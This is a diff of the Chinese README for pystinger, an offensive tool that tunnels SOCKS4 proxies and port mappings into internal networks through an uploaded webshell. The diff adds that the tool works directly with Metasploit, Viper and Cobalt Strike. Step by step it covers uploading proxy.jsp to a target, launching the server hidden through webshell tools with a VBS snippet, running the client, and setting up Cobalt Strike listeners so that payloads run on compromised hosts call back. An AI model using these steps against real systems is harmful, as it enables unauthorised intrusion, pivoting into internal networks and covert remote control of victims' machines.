1
- # 毒刺(pystinger_for_darkshadow)
2
- 毒刺(pystinger_for_darkshadow)是一个通过webshell实现** 内网SOCK4代理** ,** 端口映射** .工具主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.
1
+ # 毒刺(pystinger)
2
+
3
+ 毒刺(pystinger)通过webshell实现** 内网SOCK4代理** ,** 端口映射** .
4
+
5
+ 可直接用于metasploit-framework,viper,cobalt strike上线
6
+
7
+ 主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.
8
+
3
9
# 使用方法
4
10
5
11
## SOCK4代理
6
- * proxy.jsp上传到目标服务器,确保 [ http://192.168.3.11:8080/proxy.jsp ] ( http://192.168.3.11:8080/proxy.jsp ) 可以访问,页面返回 stinger XXX!
12
+
13
+ * proxy.jsp上传到目标服务器,确保 [ http://192.168.3.11:8080/proxy.jsp ] ( http://192.168.3.11:8080/proxy.jsp ) 可以访问,页面返回 stinger XXX!
7
14
* 将stinger_server.exe和stinger_server.vbs上传到目标服务器,蚁剑/冰蝎执行``` stinger_server.vbs ``` 启动服务端
8
- (修改vbs中路径,不要直接运行exe文件,会导致tcp断连)
9
- * stinger_client命令行执行``` ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000 ``` ,生成如下输出表示成功
15
+ > 修改vbs中exe路径,不要直接运行exe文件,会导致tcp断连
16
+ * stinger_client命令行执行``` ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000 ```
17
+ * 如下输出表示成功
10
18
```
11
19
root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1 -p 60000
12
20
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
@@ -37,10 +45,12 @@ root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1
37
45
* 此时已经在本地60000启动了一个192.168.3.11所在内网的socks4代理
38
46
39
47
## cobalt strike单主机上线
40
- * proxy.jsp上传到目标服务器,确保 [ http://192.168.3.11:8080/proxy.jsp ] ( http://192.168.3.11:8080/proxy.jsp ) 可以访问,页面返回 stinger XXX!
48
+
49
+ * proxy.jsp上传到目标服务器,确保 [ http://192.168.3.11:8080/proxy.jsp ] ( http://192.168.3.11:8080/proxy.jsp ) 可以访问,页面返回 stinger XXX!
41
50
* 将stinger_server.exe和stinger_server.vbs上传到目标服务器,蚁剑/冰蝎执行``` stinger_server.vbs ``` 启动服务端
42
- (修改vbs中路径,不要直接运行exe文件,会导致tcp断连)
43
- * stinger_client命令行执行``` ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000 ``` ,生成如下输出表示成功
51
+ > 修改vbs中路径,不要直接运行exe文件,会导致tcp断连
52
+ * stinger_client命令行执行``` ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000 ```
53
+ * 如下输出表示成功
44
54
```
45
55
root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1 -p 60000
46
56
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
@@ -67,20 +77,23 @@ root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1
67
77
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
68
78
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
69
79
```
70
- * cobalt strike添加监听,端口选择RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1
80
+ * cobalt strike添加监听,端口选择输出信息RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1
71
81
* 生成payload,上传到主机运行后即可上线
72
82
73
83
## cobalt strike多主机上线
74
- * proxy.jsp上传到目标服务器,确保 [ http://192.168.3.11:8080/proxy.jsp ] ( http://192.168.3.11:8080/proxy.jsp ) 可以访问,页面返回 stinger XXX!
84
+
85
+ * proxy.jsp上传到目标服务器,确保 [ http://192.168.3.11:8080/proxy.jsp ] ( http://192.168.3.11:8080/proxy.jsp ) 可以访问,页面返回 stinger XXX!
75
86
* 将stinger_server.exe上传到目标服务器
76
87
* 修改stinger_server.vbs,示例如下:
77
88
```
78
89
Set ws = CreateObject("Wscript.Shell")
79
90
ws.run "cmd /c D:\XXXXX\stinger_server.exe 192.168.3.11",vbhide
80
91
```
81
- (192.168.3.11可以改成0.0.0.0)
82
- * 蚁剑/冰蝎执行``` stinger_server.vbs ``` 启动服务端
83
- * stinger_client命令行执行``` ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000 ``` ,生成如下输出表示成功
92
+ > 192.168.3.11可以改成0.0.0.0
93
+
94
+ * 蚁剑/冰蝎执行``` stinger_server.vbs ``` 启动服务端
95
+ * stinger_client命令行执行``` ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 0.0.0.0 -p 60000 ```
96
+ * 如下输出表示成功
84
97
```
85
98
root@kali:~# ./stinger_client -w http://192.168.3.11:8080/proxy.jsp -l 127.0.0.1 -p 60000
86
99
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
0 commit comments